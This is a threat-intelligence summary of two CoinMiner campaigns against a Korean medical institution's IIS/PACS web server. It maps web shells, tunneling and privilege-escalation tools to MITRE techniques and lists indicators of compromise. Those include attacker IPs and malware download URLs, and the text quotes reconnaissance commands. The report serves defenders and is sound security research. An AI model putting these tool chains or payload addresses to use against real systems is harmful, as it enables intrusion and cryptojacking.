Threat Research

CoinMiner Attacks Targeting Korean Web Servers: An Analysis

Ahnlab

Two separate CoinMiner campaigns targeted a Korean medical institution’s Windows IIS/PACS server, exploiting web-facing vulnerabilities and deploying multiple web shells and mining payloads. The attacks, likely conducted by Chinese-speaking threat actors, leveraged proxy tools and remote-access utilities to establish persistence and mine cryptocurrency while potentially exfiltrating data. #CoinMiner #Chopper #Behinder #CPOLAR #RingQ #GodPotato #EarthWorm #Ladon #Frpc #IIS #PACS #KoreanWebServers #ASECBlog

Keypoints

  • ASEC tracked two separate CoinMiner attack cases against a vulnerable Korean web server hosting PACS on Windows IIS.
  • Attackers uploaded web shells (Chopper, Behinder, Godzilla) and used tunneling/proxy tools (CPOLAR, Frpc, Lcx, EarthWorm) to expose the internal system and enable remote access.
  • The threat actors appear to be Chinese-speaking, based on tool choices and Chinese annotations found in scripts.
  • CoinMiner was delivered via a cab/downloader chain (1.cab containing 1.bat, a task-scheduler XML, and a CoinMiner downloader) that downloads additional payloads from external sources.
  • Privilege escalation tools (BadPotato, GodPotato, PrintNotifyPotato, IIS LPE) and network tools (NetCat) were deployed to move laterally and control the infected host.
  • The second attack reused web shells (Chopper, Behinder, Godzilla) and added new components (Certutil downloader, Ladon, RingQ) to extend access and evade detection.
  • The ongoing objective across campaigns was cryptocurrency mining via XMRig, with multiple mining pools listed as targets.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Initial access via exposed web servers with web shells uploaded; “Multiple web shell upload attempts were identified on the targeted web server”.
  • [T1082] System Information Discovery (Windows Command Shell: T1059.003) – The threat actor used commands to collect system information: “whoami, ipconfig, tasklist, systeminfo, netstat -ano, query user, ping 8.8.8.8”.
  • [T1059.003] Windows Command Shell – Direct execution of commands to enumerate system details.
  • [T1105] Ingress Tool Transfer – Downloading “1.cab” containing “1.bat”, an XML for task scheduler, and a CoinMiner downloader; “The downloader also downloads and installs a zip file from an external source.”.
  • [T1021.001] Remote Services – Use of tunneling/proxy tools to expose internal hosts and enable remote access via RDP; “expose systems… enabling threat actors to remotely access them via RDP from the outside.”.
  • [T1136] Create Account – Adding new user accounts for persistent access; “the ‘useradd.exe’ malware… adds the account with a random password and displays the result.”.
  • [T1027] Obfuscated/Compressed Files or Information – RingQ encrypts malware/tools to evade detection and executes in memory; “encrypts typical malware and tools to prevent easy detection by anti-malware products, then executes them in the memory.”.
  • [T1068] Exploitation for Privilege Escalation – Deploying privilege escalation tools (BadPotato, GodPotato, PrintNotifyPotato, IIS LPE) and referencing CVE-2021-1732 malware; “privilege escalation tools… and the CVE-2021-1732 vulnerability malware.”.
  • [T1003] Credential Access – Ladon includes account credential theft among its functions; “major functions include scanning, privilege escalation, account credential theft, and reverse shell.”.

Indicators of Compromise

  • [MD5 Hash] First Attack Case – 67af0bc97b3ea18025a88a0b0201c18d, f6591c1ab7f7b782c386af1b6c2c0e9b, and 2 more hashes
  • [IP Address] – 14.19.214.36:6666, 14.19.214.36:3333
  • [IP Address] – 141.11.89.42:8443, 141.11.89.42:995
  • [Domain/URL] – sinmaxinter.top:7001/services.zip, sinmaxinter.top:7001/C3-server25.zip
  • [Domain/URL] – info.perflogs.top:995, pop3.wptask.cy0u:995

Read more: https://asec.ahnlab.com/en/66994/